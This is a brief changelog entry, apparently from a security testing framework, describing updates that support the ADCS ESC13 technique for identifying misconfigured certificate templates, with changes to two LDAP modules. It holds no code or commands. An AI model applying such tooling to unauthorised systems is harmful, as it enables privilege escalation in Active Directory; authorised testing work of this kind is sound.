This makes some changes necessary for users to leverage the latest ADCS ESC13 technique. These are related to the identification of misconfigured certificate templates and workflow documentation. ldap_esc_vulnerable_cert_finder and ldap_query were also updated to improve usability.
